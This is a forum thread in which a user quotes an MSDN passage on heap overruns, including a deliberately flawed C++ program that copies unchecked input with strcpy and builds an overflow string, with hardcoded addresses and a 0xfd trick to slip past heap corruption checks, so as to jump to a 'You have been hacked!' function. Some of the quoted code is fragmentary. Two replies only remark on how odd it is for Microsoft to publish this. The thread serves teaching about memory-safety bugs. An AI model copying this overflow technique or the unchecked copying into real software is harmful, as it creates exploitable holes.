Thread: Think this is unlike Microsoft?

  1. #1
    Registered User Xei's Avatar
    Join Date
    May 2002

    Think this is unlike Microsoft?

    I stumbled upon this
    while at MSDN. Incase if you do not want to load the page, Here is their page:

    "A heap overrun is much the same problem as a static buffer overrun, but it is more difficult to exploit. 
    As in the case of a static buffer overrun, attackers can write arbitrary information 
    into places in your application that they should not have access to. 
    An excellent article is "w00w00 on Heap Overflows,"
     written by Matt Conover of w00w00 Security Development (WSD). 
    You can find this article at
    The following application shows how a heap overrun can be exploited:"
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
      Very flawed class to demonstrate a problem
    class BadStringBuf
            m_buf = NULL;
            if(m_buf != NULL)
        void Init(char* buf)
            //Really bad code
            m_buf = buf;
        void SetString(const char* input)
            //This is stupid.
            strcpy(m_buf, input);
        const char* GetString(void)
            return m_buf;
        char* m_buf;
    //Declare a pointer to the BadStringBuf class to hold our input.
    BadStringBuf* g_pInput = NULL;
    void bar(void)
        printf("You have been hacked!\n");
    void BadFunc(const char* input1, const char* input2)
        //Someone said that heap overruns were not exploitable,
        //so allocate the buffer on the heap.
        char* buf = NULL;
        char* buf2;
        buf2 = (char*)malloc(16);
        g_pInput = new BadStringBuf;
        buf = (char*)malloc(16);
        //Bad programmer - no error checking on allocations
        //The worst that can happen is a crash, right?
        strcpy(buf, input1);
        printf("input 1 = %s\ninput2 = %s\n", buf, g_pInput->GetString());
        if(buf != NULL)
    int main(int argc, char* argv[])
        //Simulated argv strings
        char arg1[128];
        //This is the address of the bar function. 
        char arg2[4] = {0x0f, 0x10, 0x40, 0};    
        int offset = 0x40;  
        //Using 0xfd is an evil trick to overcome heap corruption checking.
        //The 0xfd value at the end of the buffer checks for corruption.
        //No error checking here  it is just an example of how to 
        //construct an overflow string.
        memset(arg1, 0xfd, offset);
        arg1[offset]   = (char)0x94;
        arg1[offset+1] = (char)0xfe;
        arg1[offset+2] = (char)0x12;
        arg1[offset+3] = 0;
        arg1[offset+4] = 0;
        printf("Address of bar is %p\n", bar);
        BadFunc(arg1, arg2);
        if(g_pInput != NULL)
            delete g_pInput;
        return 0;
    First off, do you think that Microsoft using references to someone elses code seems like them? Second, it doesn't seem likely for them to post an article like that. I'm suprised. (Even look at the comments in the code)
    Last edited by Xei; 04-12-2003 at 03:43 PM.

  2. #2
    Registered User TravisS's Avatar
    Join Date
    Jun 2002
    lol, I agree, that doesn't seem like something I'd expect to find on the MSDN...

  3. #3
    Registered User CompiledMonkey's Avatar
    Join Date
    Feb 2002
    Richmond, VA
    The odd thing to me is that is was written by w00w00. I don't see how MS would publish something by them...

Popular pages Recent additions subscribe to a feed

Similar Threads

  1. Problem building Quake source
    By Silvercord in forum Game Programming
    Replies: 16
    Last Post: 07-11-2010, 09:13 AM
  2. Apps that act "differently" in XP SP2
    By Stan100 in forum Tech Board
    Replies: 6
    Last Post: 08-16-2004, 10:38 PM
  3. Another Microsoft joke
    By Panopticon in forum A Brief History of
    Replies: 9
    Last Post: 02-02-2003, 12:53 PM
  4. Microsoft rulling
    By Sentaku senshi in forum A Brief History of
    Replies: 1
    Last Post: 11-02-2002, 03:50 AM
  5. Retaliation towards witch king\microsoft
    By Koshare in forum Linux Programming
    Replies: 7
    Last Post: 10-19-2001, 04:54 AM